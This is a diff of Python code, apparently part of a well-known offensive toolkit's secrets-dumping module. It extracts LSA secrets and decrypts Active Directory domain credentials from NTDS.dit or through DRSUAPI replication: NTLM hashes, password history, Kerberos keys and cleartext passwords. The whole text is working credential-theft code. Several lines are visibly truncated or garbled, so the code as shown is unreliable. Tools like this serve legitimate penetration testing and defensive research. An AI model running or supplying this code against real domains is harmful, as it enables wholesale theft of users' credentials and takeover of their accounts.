+ for etype in allciphers:
+ try:
+ key = string_to_key(etype, rawsecret, salt, None)
+ except Exception:
+ LOG.debug('Exception', exc_info=True)
+ raise
+ typename = NTDSHashes.KERBEROS_TYPE[etype]
+ secret = "%s:%s:%s" % (machinename, typename, hexlify(key.contents).decode('utf-8'))
+ self.__secretItems.append(secret)
+ self.__perSecretCallback(LSASecrets.SECRET_TYPE.LSA_KERBEROS, secret)
+ return True
+ else:
+ return False
+
+ def dumpSecrets(self):
+ if self.__securityFile is None:
+ # No SECURITY file provided
+ return
+
+ LOG.info('Dumping LSA Secrets')
+
+ # Let's first see if there are cached entries
+ keys = self.enumKey('\\Policy\\Secrets')
+ if keys is None:
+ # No entries
+ return
+ try:
+ # Remove unnecessary value
+ keys.remove(b'NL$Control')
+ except:
+ pass
+
+ if self.__LSAKey == b'':
+ self.__getLSASecretKey()
+
+ for key in keys:
+ LOG.debug('Looking into %s' % key)
+ valueTypeList = ['CurrVal']
+ # Check if old LSA secrets values are also need to be shown
+ if self.__history:
+ valueTypeList.append('OldVal')
+
+ for valueType in valueTypeList:
+ value = self.getValue('\\Policy\\Secrets\\{}\\{}\\default'.format(key,valueType))
+ if value is not None and value[1] != 0:
+ if self.__vistaStyle is True:
+ record = LSA_SECRET(value[1])
+ tmpKey = self.__sha256(self.__LSAKey, record['EncryptedData'][:32])
+ plainText = self.__cryptoCommon.decryptAES(tmpKey, record['EncryptedData'][32:])
+ record = LSA_SECRET_BLOB(plainText)
+ secret = record['Secret']
+ else:
+ secret = self.__decryptSecret(self.__LSAKey, value[1])
+
+ # If this is an OldVal secret, let's append '_history' to be able to distinguish it and
+ # also be consistent with NTDS history
+ if valueType == 'OldVal':
+ key += '_history'
+ self.__printSecret(key, secret)
+
+ def exportSecrets(self, baseFileName, openFileFunc = None):
+ if len(self.__secretItems) > 0:
+ fileName = baseFileName+'.secrets'
+ fd = openFile(fileName, openFileFunc=openFileFunc)
+ for item in self.__secretItems:
+ fd.write(item+'\n')
+ fd.close()
+ return fileName
+
+ def exportCached(self, baseFileName, openFileFunc = None):
+ if len(self.__cachedItems) > 0:
+ fileName = baseFileName+'.cached'
+ fd = openFile(fileName, openFileFunc=openFileFunc)
+ for item in self.__cachedItems:
+ fd.write(item+'\n')
+ fd.close()
+ return fileName
+
+
+class ResumeSessionMgrInFile(object):
+ def __init__(self, resumeFileName=None):
+ self.__resumeFileName = resumeFileName
+ self.__resumeFile = None
+ self.__hasResumeData = resumeFileName is not None
+
+ def hasResumeData(self):
+ return self.__hasResumeData
+
+ def clearResumeData(self):
+ self.endTransaction()
+ if self.__resumeFileName and os.path.isfile(self.__resumeFileName):
+ os.remove(self.__resumeFileName)
+
+ def writeResumeData(self, data):
+ # self.beginTransaction() must be called first, but we are aware of performance here, so we avoid checking that
+ self.__resumeFile.seek(0, 0)
+ self.__resumeFile.truncate(0)
+ self.__resumeFile.write(data.encode())
+ self.__resumeFile.flush()
+
+ def getResumeData(self):
+ try:
+ self.__resumeFile = open(self.__resumeFileName,'rb')
+ except Exception as e:
+ raise Exception('Cannot open resume session file name %s' % str(e))
+ resumeSid = self.__resumeFile.read()
+ self.__resumeFile.close()
+ # Truncate and reopen the file as wb+
+ self.__resumeFile = open(self.__resumeFileName,'wb+')
+ return resumeSid.decode('utf-8')
+
+ def getFileName(self):
+ return self.__resumeFileName
+
+ def beginTransaction(self):
+ if not self.__resumeFileName:
+ self.__resumeFileName = 'sessionresume_%s' % ''.join(random.choice(string.ascii_letters) for _ in range(8))
+ LOG.debug('Session resume file will be %s' % self.__resumeFileName)
+ if not self.__resumeFile:
+ try:
+ self.__resumeFile = open(self.__resumeFileName, 'wb+')
+ except Exception as e:
+ raise Exception('Cannot create "%s" resume session file: %s' % (self.__resumeFileName, str(e)))
+
+ def endTransaction(self):
+ if self.__resumeFile:
+ self.__resumeFile.close()
+ self.__resumeFile = None
+
+
+class NTDSHashes:
+ class SECRET_TYPE:
+ NTDS = 0
+ NTDS_CLEARTEXT = 1
+ NTDS_KERBEROS = 2
+
+ NAME_TO_INTERNAL = {
+ 'uSNCreated':b'ATTq131091',
+ 'uSNChanged':b'ATTq131192',
+ 'name':b'ATTm3',
+ 'objectGUID':b'ATTk589826',
+ 'objectSid':b'ATTr589970',
+ 'userAccountControl':b'ATTj589832',
+ 'primaryGroupID':b'ATTj589922',
+ 'accountExpires':b'ATTq589983',
+ 'logonCount':b'ATTj589993',
+ 'sAMAccountName':b'ATTm590045',
+ 'sAMAccountType':b'ATTj590126',
+ 'lastLogonTimestamp':b'ATTq589876',
+ 'userPrincipalName':b'ATTm590480',
+ 'unicodePwd':b'ATTk589914',
+ 'dBCSPwd':b'ATTk589879',
+ 'ntPwdHistory':b'ATTk589918',
+ 'lmPwdHistory':b'ATTk589984',
+ 'pekList':b'ATTk590689',
+ 'supplementalCredentials':b'ATTk589949',
+ 'pwdLastSet':b'ATTq589920',
+ }
+
+ NAME_TO_ATTRTYP = {
+ 'userPrincipalName': 0x90290,
+ 'sAMAccountName': 0x900DD,
+ 'unicodePwd': 0x9005A,
+ 'dBCSPwd': 0x90037,
+ 'ntPwdHistory': 0x9005E,
+ 'lmPwdHistory': 0x900A0,
+ 'supplementalCredentials': 0x9007D,
+ 'objectSid': 0x90092,
+ 'userAccountControl':0x90008,
+ }
+
+ ATTRTYP_TO_ATTID = {
+ 'userPrincipalName': '1.2.840.113556.1.4.656',
+ 'sAMAccountName': '1.2.840.113556.1.4.221',
+ 'unicodePwd': '1.2.840.113556.1.4.90',
+ 'dBCSPwd': '1.2.840.113556.1.4.55',
+ 'ntPwdHistory': '1.2.840.113556.1.4.94',
+ 'lmPwdHistory': '1.2.840.113556.1.4.160',
+ 'supplementalCredentials': '1.2.840.113556.1.4.125',
+ 'objectSid': '1.2.840.113556.1.4.146',
+ 'pwdLastSet': '1.2.840.113556.1.4.96',
+ 'userAccountControl':'1.2.840.113556.1.4.8',
+ }
+
+ KERBEROS_TYPE = {
+ 1:'dec-cbc-crc',
+ 3:'des-cbc-md5',
+ 17:'aes128-cts-hmac-sha1-96',
+ 18:'aes256-cts-hmac-sha1-96',
+ 0xffffff74:'rc4_hmac',
+ }
+
+ INTERNAL_TO_NAME = dict((v,k) for k,v in NAME_TO_INTERNAL.items())
+
+ SAM_NORMAL_USER_ACCOUNT = 0x30000000
+ SAM_MACHINE_ACCOUNT = 0x30000001
+ SAM_TRUST_ACCOUNT = 0x30000002
+
+ ACCOUNT_TYPES = ( SAM_NORMAL_USER_ACCOUNT, SAM_MACHINE_ACCOUNT, SAM_TRUST_ACCOUNT)
+
+ class PEKLIST_ENC(Structure):
+ structure = (
+ ('Header','8s=b""'),
+ ('KeyMaterial','16s=b""'),
+ ('EncryptedPek',':'),
+ )
+
+ class PEKLIST_PLAIN(Structure):
+ structure = (
+ ('Header','32s=b""'),
+ ('DecryptedPek',':'),
+ )
+
+ class PEK_KEY(Structure):
+ structure = (
+ ('Header','1s=b""'),
+ ('Padding','3s=b""'),
+ ('Key','16s=b""'),
+ )
+
+ class CRYPTED_HASH(Structure):
+ structure = (
+ ('Header','8s=b""'),
+ ('KeyMaterial','16s=b""'),
+ ('EncryptedHash','16s=b""'),
+ )
+
+ class CRYPTED_HASHW16(Structure):
+ structure = (
+ ('Header','8s=b""'),
+ ('KeyMaterial','16s=b""'),
+ ('Unknown',' 24:
+ if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
+ domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
+ userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
+ else:
+ userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
+ cipherText = self.CRYPTED_BLOB(unhexlify(record[self.NAME_TO_INTERNAL['supplementalCredentials']]))
+
+ if cipherText['Header'][:4] == b'\x13\x00\x00\x00':
+ # Win2016 TP4 decryption is different
+ pekIndex = hexlify(cipherText['Header'])
+ plainText = self.__cryptoCommon.decryptAES(self.__PEK[int(pekIndex[8:10])],
+ cipherText['EncryptedHash'][4:],
+ cipherText['KeyMaterial'])
+ haveInfo = True
+ else:
+ plainText = self.__removeRC4Layer(cipherText)
+ haveInfo = True
+ else:
+ domain = None
+ userName = None
+ replyVersion = 'V%d' % record['pdwOutVersion']
+ for attr in record['pmsgOut'][replyVersion]['pObjects']['Entinf']['AttrBlock']['pAttr']:
+ try:
+ attId = drsuapi.OidFromAttid(prefixTable, attr['attrTyp'])
+ LOOKUP_TABLE = self.ATTRTYP_TO_ATTID
+ except Exception as e:
+ LOG.debug('Failed to execute OidFromAttid with error %s' % e)
+ LOG.debug('Exception', exc_info=True)
+ # Fallbacking to fixed table and hope for the best
+ attId = attr['attrTyp']
+ LOOKUP_TABLE = self.NAME_TO_ATTRTYP
+
+ if attId == LOOKUP_TABLE['userPrincipalName']:
+ if attr['AttrVal']['valCount'] > 0:
+ try:
+ domain = b''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le').split('@')[-1]
+ except:
+ domain = None
+ else:
+ domain = None
+ elif attId == LOOKUP_TABLE['sAMAccountName']:
+ if attr['AttrVal']['valCount'] > 0:
+ try:
+ userName = b''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le')
+ except:
+ LOG.error(
+ 'Cannot get sAMAccountName for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
+ userName = 'unknown'
+ else:
+ LOG.error('Cannot get sAMAccountName for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
+ userName = 'unknown'
+ if attId == LOOKUP_TABLE['supplementalCredentials']:
+ if attr['AttrVal']['valCount'] > 0:
+ blob = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
+ plainText = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), blob)
+ if len(plainText) > 24:
+ haveInfo = True
+ if domain is not None:
+ userName = '%s\\%s' % (domain, userName)
+
+ if haveInfo is True:
+ try:
+ userProperties = samr.USER_PROPERTIES(plainText)
+ except:
+ # On some old w2k3 there might be user properties that don't
+ # match [MS-SAMR] structure, discarding them
+ return
+ propertiesData = userProperties['UserProperties']
+ for propertyCount in range(userProperties['PropertyCount']):
+ userProperty = samr.USER_PROPERTY(propertiesData)
+ propertiesData = propertiesData[len(userProperty):]
+ # For now, we will only process Newer Kerberos Keys and CLEARTEXT
+ if userProperty['PropertyName'].decode('utf-16le') == 'Primary:Kerberos-Newer-Keys':
+ propertyValueBuffer = unhexlify(userProperty['PropertyValue'])
+ kerbStoredCredentialNew = samr.KERB_STORED_CREDENTIAL_NEW(propertyValueBuffer)
+ data = kerbStoredCredentialNew['Buffer']
+ for credential in range(kerbStoredCredentialNew['CredentialCount']):
+ keyDataNew = samr.KERB_KEY_DATA_NEW(data)
+ data = data[len(keyDataNew):]
+ keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]
+
+ if keyDataNew['KeyType'] in self.KERBEROS_TYPE:
+ answer = "%s:%s:%s" % (userName, self.KERBEROS_TYPE[keyDataNew['KeyType']],hexlify(keyValue).decode('utf-8'))
+ else:
+ answer = "%s:%s:%s" % (userName, hex(keyDataNew['KeyType']),hexlify(keyValue).decode('utf-8'))
+ # We're just storing the keys, not printing them, to make the output more readable
+ # This is kind of ugly... but it's what I came up with tonight to get an ordered
+ # set :P. Better ideas welcomed ;)
+ self.__kerberosKeys[answer] = None
+ if keysFile is not None:
+ self.__writeOutput(keysFile, answer + '\n')
+ elif userProperty['PropertyName'].decode('utf-16le') == 'Primary:CLEARTEXT':
+ # [MS-SAMR] 3.1.1.8.11.5 Primary:CLEARTEXT Property
+ # This credential type is the cleartext password. The value format is the UTF-16 encoded cleartext password.
+ try:
+ answer = "%s:CLEARTEXT:%s" % (userName, unhexlify(userProperty['PropertyValue']).decode('utf-16le'))
+ except UnicodeDecodeError:
+ # This could be because we're decoding a machine password. Printing it hex
+ answer = "%s:CLEARTEXT:0x%s" % (userName, userProperty['PropertyValue'].decode('utf-8'))
+
+ self.__clearTextPwds[answer] = None
+ if clearTextFile is not None:
+ self.__writeOutput(clearTextFile, answer + '\n')
+
+ if clearTextFile is not None:
+ clearTextFile.flush()
+ if keysFile is not None:
+ keysFile.flush()
+
+ LOG.debug('Leaving NTDSHashes.__decryptSupplementalInfo')
+
+ def __decryptHash(self, record, prefixTable=None, outputFile=None):
+ LOG.debug('Entering NTDSHashes.__decryptHash')
+ if self.__useVSSMethod is True:
+ LOG.debug('Decrypting hash for user: %s' % record[self.NAME_TO_INTERNAL['name']])
+
+ sid = SAMR_RPC_SID(unhexlify(record[self.NAME_TO_INTERNAL['objectSid']]))
+ rid = sid.formatCanonical().split('-')[-1]
+
+ if record[self.NAME_TO_INTERNAL['dBCSPwd']] is not None:
+ encryptedLMHash = self.CRYPTED_HASH(unhexlify(record[self.NAME_TO_INTERNAL['dBCSPwd']]))
+ if encryptedLMHash['Header'][:4] == b'\x13\x00\x00\x00':
+ # Win2016 TP4 decryption is different
+ encryptedLMHash = self.CRYPTED_HASHW16(unhexlify(record[self.NAME_TO_INTERNAL['dBCSPwd']]))
+ pekIndex = hexlify(encryptedLMHash['Header'])
+ tmpLMHash = self.__cryptoCommon.decryptAES(self.__PEK[int(pekIndex[8:10])],
+ encryptedLMHash['EncryptedHash'][:16],
+ encryptedLMHash['KeyMaterial'])
+ else:
+ tmpLMHash = self.__removeRC4Layer(encryptedLMHash)
+ LMHash = self.__removeDESLayer(tmpLMHash, rid)
+ else:
+ LMHash = ntlm.LMOWFv1('', '')
+
+ if record[self.NAME_TO_INTERNAL['unicodePwd']] is not None:
+ encryptedNTHash = self.CRYPTED_HASH(unhexlify(record[self.NAME_TO_INTERNAL['unicodePwd']]))
+ if encryptedNTHash['Header'][:4] == b'\x13\x00\x00\x00':
+ # Win2016 TP4 decryption is different
+ encryptedNTHash = self.CRYPTED_HASHW16(unhexlify(record[self.NAME_TO_INTERNAL['unicodePwd']]))
+ pekIndex = hexlify(encryptedNTHash['Header'])
+ tmpNTHash = self.__cryptoCommon.decryptAES(self.__PEK[int(pekIndex[8:10])],
+ encryptedNTHash['EncryptedHash'][:16],
+ encryptedNTHash['KeyMaterial'])
+ else:
+ tmpNTHash = self.__removeRC4Layer(encryptedNTHash)
+ NTHash = self.__removeDESLayer(tmpNTHash, rid)
+ else:
+ NTHash = ntlm.NTOWFv1('', '')
+
+ if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
+ domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
+ userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
+ else:
+ userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
+
+ if self.__printUserStatus is True:
+ # Enabled / disabled users
+ if record[self.NAME_TO_INTERNAL['userAccountControl']] is not None:
+ if '{0:08b}'.format(record[self.NAME_TO_INTERNAL['userAccountControl']])[-2:-1] == '1':
+ userAccountStatus = 'Disabled'
+ elif '{0:08b}'.format(record[self.NAME_TO_INTERNAL['userAccountControl']])[-2:-1] == '0':
+ userAccountStatus = 'Enabled'
+ else:
+ userAccountStatus = 'N/A'
+
+ if record[self.NAME_TO_INTERNAL['pwdLastSet']] is not None:
+ pwdLastSet = self.__fileTimeToDateTime(record[self.NAME_TO_INTERNAL['pwdLastSet']])
+ else:
+ pwdLastSet = 'N/A'
+
+ answer = "%s:%s:%s:%s:::" % (userName, rid, hexlify(LMHash).decode('utf-8'), hexlify(NTHash).decode('utf-8'))
+ if self.__pwdLastSet is True:
+ answer = "%s (pwdLastSet=%s)" % (answer, pwdLastSet)
+ if self.__printUserStatus is True:
+ answer = "%s (status=%s)" % (answer, userAccountStatus)
+
+ self.__perSecretCallback(NTDSHashes.SECRET_TYPE.NTDS, answer)
+
+ if outputFile is not None:
+ self.__writeOutput(outputFile, answer + '\n')
+
+ if self.__history:
+ LMHistory = []
+ NTHistory = []
+ if record[self.NAME_TO_INTERNAL['lmPwdHistory']] is not None:
+ encryptedLMHistory = self.CRYPTED_HISTORY(unhexlify(record[self.NAME_TO_INTERNAL['lmPwdHistory']]))
+ tmpLMHistory = self.__removeRC4Layer(encryptedLMHistory)
+ for i in range(0, len(tmpLMHistory) // 16):
+ LMHash = self.__removeDESLayer(tmpLMHistory[i * 16:(i + 1) * 16], rid)
+ LMHistory.append(LMHash)
+
+ if record[self.NAME_TO_INTERNAL['ntPwdHistory']] is not None:
+ encryptedNTHistory = self.CRYPTED_HISTORY(unhexlify(record[self.NAME_TO_INTERNAL['ntPwdHistory']]))
+
+ if encryptedNTHistory['Header'][:4] == b'\x13\x00\x00\x00':
+ # Win2016 TP4 decryption is different
+ encryptedNTHistory = self.CRYPTED_HASHW16(
+ unhexlify(record[self.NAME_TO_INTERNAL['ntPwdHistory']]))
+ pekIndex = hexlify(encryptedNTHistory['Header'])
+ tmpNTHistory = self.__cryptoCommon.decryptAES(self.__PEK[int(pekIndex[8:10])],
+ encryptedNTHistory['EncryptedHash'],
+ encryptedNTHistory['KeyMaterial'])
+ else:
+ tmpNTHistory = self.__removeRC4Layer(encryptedNTHistory)
+
+ for i in range(0, len(tmpNTHistory) // 16):
+ NTHash = self.__removeDESLayer(tmpNTHistory[i * 16:(i + 1) * 16], rid)
+ NTHistory.append(NTHash)
+
+ for i, (LMHash, NTHash) in enumerate(
+ map(lambda l, n: (l, n) if l else ('', n), LMHistory[1:], NTHistory[1:])):
+ if self.__noLMHash:
+ lmhash = hexlify(ntlm.LMOWFv1('', ''))
+ else:
+ lmhash = hexlify(LMHash)
+
+ answer = "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash.decode('utf-8'),
+ hexlify(NTHash).decode('utf-8'))
+ if outputFile is not None:
+ self.__writeOutput(outputFile, answer + '\n')
+ self.__perSecretCallback(NTDSHashes.SECRET_TYPE.NTDS, answer)
+ else:
+ replyVersion = 'V%d' %record['pdwOutVersion']
+ LOG.debug('Decrypting hash for user: %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
+ domain = None
+ if self.__history:
+ LMHistory = []
+ NTHistory = []
+
+ rid = unpack(' 0:
+ encrypteddBCSPwd = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
+ encryptedLMHash = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encrypteddBCSPwd)
+ LMHash = drsuapi.removeDESLayer(encryptedLMHash, rid)
+ else:
+ LMHash = ntlm.LMOWFv1('', '')
+ elif attId == LOOKUP_TABLE['unicodePwd']:
+ if attr['AttrVal']['valCount'] > 0:
+ encryptedUnicodePwd = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
+ encryptedNTHash = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedUnicodePwd)
+ NTHash = drsuapi.removeDESLayer(encryptedNTHash, rid)
+ else:
+ NTHash = ntlm.NTOWFv1('', '')
+ elif attId == LOOKUP_TABLE['userPrincipalName']:
+ if attr['AttrVal']['valCount'] > 0:
+ try:
+ domain = b''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le').split('@')[-1]
+ except:
+ domain = None
+ else:
+ domain = None
+ elif attId == LOOKUP_TABLE['sAMAccountName']:
+ if attr['AttrVal']['valCount'] > 0:
+ try:
+ userName = b''.join(attr['AttrVal']['pAVal'][0]['pVal']).decode('utf-16le')
+ except:
+ LOG.error('Cannot get sAMAccountName for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
+ userName = 'unknown'
+ else:
+ LOG.error('Cannot get sAMAccountName for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
+ userName = 'unknown'
+ elif attId == LOOKUP_TABLE['objectSid']:
+ if attr['AttrVal']['valCount'] > 0:
+ objectSid = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
+ else:
+ LOG.error('Cannot get objectSid for %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
+ objectSid = rid
+ elif attId == LOOKUP_TABLE['pwdLastSet']:
+ if attr['AttrVal']['valCount'] > 0:
+ try:
+ pwdLastSet = self.__fileTimeToDateTime(unpack(' 0:
+ if (unpack(' 0:
+ encryptedLMHistory = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
+ tmpLMHistory = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedLMHistory)
+ for i in range(0, len(tmpLMHistory) // 16):
+ LMHashHistory = drsuapi.removeDESLayer(tmpLMHistory[i * 16:(i + 1) * 16], rid)
+ LMHistory.append(LMHashHistory)
+ else:
+ LOG.debug('No lmPwdHistory for user %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
+ elif attId == LOOKUP_TABLE['ntPwdHistory']:
+ if attr['AttrVal']['valCount'] > 0:
+ encryptedNTHistory = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])
+ tmpNTHistory = drsuapi.DecryptAttributeValue(self.__remoteOps.getDrsr(), encryptedNTHistory)
+ for i in range(0, len(tmpNTHistory) // 16):
+ NTHashHistory = drsuapi.removeDESLayer(tmpNTHistory[i * 16:(i + 1) * 16], rid)
+ NTHistory.append(NTHashHistory)
+ else:
+ LOG.debug('No ntPwdHistory for user %s' % record['pmsgOut'][replyVersion]['pNC']['StringName'][:-1])
+
+ if domain is not None:
+ userName = '%s\\%s' % (domain, userName)
+
+ answer = "%s:%s:%s:%s:::" % (userName, rid, hexlify(LMHash).decode('utf-8'), hexlify(NTHash).decode('utf-8'))
+ if self.__pwdLastSet is True:
+ answer = "%s (pwdLastSet=%s)" % (answer, pwdLastSet)
+ if self.__printUserStatus is True:
+ answer = "%s (status=%s)" % (answer, userAccountStatus)
+ self.__perSecretCallback(NTDSHashes.SECRET_TYPE.NTDS, answer)
+
+ if outputFile is not None:
+ self.__writeOutput(outputFile, answer + '\n')
+
+ if self.__history:
+ for i, (LMHashHistory, NTHashHistory) in enumerate(
+ map(lambda l, n: (l, n) if l else ('', n), LMHistory[1:], NTHistory[1:])):
+ if self.__noLMHash:
+ lmhash = hexlify(ntlm.LMOWFv1('', ''))
+ else:
+ lmhash = hexlify(LMHashHistory)
+
+ answer = "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash.decode('utf-8'),
+ hexlify(NTHashHistory).decode('utf-8'))
+ self.__perSecretCallback(NTDSHashes.SECRET_TYPE.NTDS, answer)
+ if outputFile is not None:
+ self.__writeOutput(outputFile, answer + '\n')
+
+ if outputFile is not None:
+ outputFile.flush()
+
+ LOG.debug('Leaving NTDSHashes.__decryptHash')
+
+ def dump(self):
+ hashesOutputFile = None
+ keysOutputFile = None
+ clearTextOutputFile = None
+
+ if self.__useVSSMethod is True:
+ if self.__NTDS is None:
+ # No NTDS.dit file provided and were asked to use VSS
+ return
+ else:
+ if self.__NTDS is None:
+ # DRSUAPI method, checking whether target is a DC
+ try:
+ if self.__remoteOps is not None:
+ try:
+ self.__remoteOps.connectSamr(self.__remoteOps.getMachineNameAndDomain()[1])
+ except:
+ if os.getenv('KRB5CCNAME') is not None and self.__justUser is not None:
+ # RemoteOperations failed. That might be because there was no way to log into the
+ # target system. We just have a last resort. Hope we have tickets cached and that they
+ # will work
+ pass
+ else:
+ raise
+ else:
+ raise Exception('No remote Operations available')
+ except Exception as e:
+ LOG.debug('Exiting NTDSHashes.dump() because %s' % e)
+ # Target's not a DC
+ return
+
+ try:
+ # Let's check if we need to save results in a file
+ if self.__outputFileName is not None:
+ LOG.debug('Saving output to %s' % self.__outputFileName)
+ # We have to export. Are we resuming a session?
+ if self.__resumeSession.hasResumeData():
+ mode = 'a+'
+ else:
+ mode = 'w+'
+ hashesOutputFile = openFile(self.__outputFileName+'.ntds',mode)
+ if self.__justNTLM is False:
+ keysOutputFile = openFile(self.__outputFileName+'.ntds.kerberos',mode)
+ clearTextOutputFile = openFile(self.__outputFileName+'.ntds.cleartext',mode)
+
+ LOG.info('Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)')
+ if self.__useVSSMethod:
+ # We start getting rows from the table aiming at reaching
+ # the pekList. If we find users records we stored them
+ # in a temp list for later process.
+ self.__getPek()
+ if self.__PEK is not None:
+ LOG.info('Reading and decrypting hashes from %s ' % self.__NTDS)
+ # First of all, if we have users already cached, let's decrypt their hashes
+ for record in self.__tmpUsers:
+ try:
+ self.__decryptHash(record, outputFile=hashesOutputFile)
+ if self.__justNTLM is False:
+ self.__decryptSupplementalInfo(record, None, keysOutputFile, clearTextOutputFile)
+ except Exception as e:
+ LOG.debug('Exception', exc_info=True)
+ try:
+ LOG.error(
+ "Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
+ LOG.error(str(e))
+ pass
+ except:
+ LOG.error("Error while processing row!")
+ LOG.error(str(e))
+ pass
+
+ # Now let's keep moving through the NTDS file and decrypting what we find
+ while True:
+ try:
+ record = self.__ESEDB.getNextRow(self.__cursor)
+ except:
+ LOG.error('Error while calling getNextRow(), trying the next one')
+ continue
+
+ if record is None:
+ break
+ try:
+ if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
+ self.__decryptHash(record, outputFile=hashesOutputFile)
+ if self.__justNTLM is False:
+ self.__decryptSupplementalInfo(record, None, keysOutputFile, clearTextOutputFile)
+ except Exception as e:
+ LOG.debug('Exception', exc_info=True)
+ try:
+ LOG.error(
+ "Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
+ LOG.error(str(e))
+ pass
+ except:
+ LOG.error("Error while processing row!")
+ LOG.error(str(e))
+ pass
+ else:
+ LOG.info('Using the DRSUAPI method to get NTDS.DIT secrets')
+ status = STATUS_MORE_ENTRIES
+ enumerationContext = 0
+
+ # Do we have to resume from a previously saved session?
+ if self.__resumeSession.hasResumeData():
+ resumeSid = self.__resumeSession.getResumeData()
+ LOG.info('Resuming from SID %s, be patient' % resumeSid)
+ else:
+ resumeSid = None
+ # We do not create a resume file when asking for a single user
+ if self.__justUser is None:
+ self.__resumeSession.beginTransaction()
+
+ if self.__justUser is not None:
+ # Depending on the input received, we need to change the formatOffered before calling
+ # DRSCrackNames.
+ # There are some instances when you call -just-dc-user and you receive ERROR_DS_NAME_ERROR_NOT_UNIQUE
+ # That's because we don't specify the domain for the user (and there might be duplicates)
+ # Always remember that if you specify a domain, you should specify the NetBIOS domain name,
+ # not the FQDN. Just for this time. It's confusing I know, but that's how this API works.
+ if self.__justUser.find('\\') >=0 or self.__justUser.find('/') >= 0:
+ self.__justUser = self.__justUser.replace('/','\\')
+ formatOffered = drsuapi.DS_NAME_FORMAT.DS_NT4_ACCOUNT_NAME
+ else:
+ formatOffered = drsuapi.DS_NT4_ACCOUNT_NAME_SANS_DOMAIN
+
+ crackedName = self.__remoteOps.DRSCrackNames(formatOffered,
+ drsuapi.DS_NAME_FORMAT.DS_UNIQUE_ID_NAME,
+ name=self.__justUser)
+
+ if crackedName['pmsgOut']['V1']['pResult']['cItems'] == 1:
+ if crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['status'] != 0:
+ raise Exception("%s: %s" % system_errors.ERROR_MESSAGES[
+ 0x2114 + crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['status']])
+
+ userRecord = self.__remoteOps.DRSGetNCChanges(crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1])
+ #userRecord.dump()
+ replyVersion = 'V%d' % userRecord['pdwOutVersion']
+ if userRecord['pmsgOut'][replyVersion]['cNumObjects'] == 0:
+ raise Exception('DRSGetNCChanges didn\'t return any object!')
+ else:
+ LOG.warning('DRSCrackNames returned %d items for user %s, skipping' % (
+ crackedName['pmsgOut']['V1']['pResult']['cItems'], self.__justUser))
+ try:
+ self.__decryptHash(userRecord,
+ userRecord['pmsgOut'][replyVersion]['PrefixTableSrc']['pPrefixEntry'],
+ hashesOutputFile)
+ if self.__justNTLM is False:
+ self.__decryptSupplementalInfo(userRecord, userRecord['pmsgOut'][replyVersion]['PrefixTableSrc'][
+ 'pPrefixEntry'], keysOutputFile, clearTextOutputFile)
+
+ except Exception as e:
+ LOG.error("Error while processing user!")
+ LOG.debug("Exception", exc_info=True)
+ LOG.error(str(e))
+ else:
+ while status == STATUS_MORE_ENTRIES:
+ resp = self.__remoteOps.getDomainUsers(enumerationContext)
+
+ for user in resp['Buffer']['Buffer']:
+ userName = user['Name']
+
+ userSid = "%s-%i" % (self.__remoteOps.getDomainSid(), user['RelativeId'])
+ if resumeSid is not None:
+ # Means we're looking for a SID before start processing back again
+ if resumeSid == userSid:
+ # Match!, next round we will back processing
+ LOG.debug('resumeSid %s reached! processing users from now on' % userSid)
+ resumeSid = None
+ else:
+ LOG.debug('Skipping SID %s since it was processed already' % userSid)
+ continue
+
+ # Let's crack the user sid into DS_FQDN_1779_NAME
+ # In theory I shouldn't need to crack the sid. Instead
+ # I could use it when calling DRSGetNCChanges inside the DSNAME parameter.
+ # For some reason tho, I get ERROR_DS_DRA_BAD_DN when doing so.
+ crackedName = self.__remoteOps.DRSCrackNames(drsuapi.DS_NAME_FORMAT.DS_SID_OR_SID_HISTORY_NAME,
+ drsuapi.DS_NAME_FORMAT.DS_UNIQUE_ID_NAME,
+ name=userSid)
+
+ if crackedName['pmsgOut']['V1']['pResult']['cItems'] == 1:
+ if crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['status'] != 0:
+ LOG.error("%s: %s" % system_errors.ERROR_MESSAGES[
+ 0x2114 + crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['status']])
+ break
+ userRecord = self.__remoteOps.DRSGetNCChanges(
+ crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1])
+ # userRecord.dump()
+ replyVersion = 'V%d' % userRecord['pdwOutVersion']
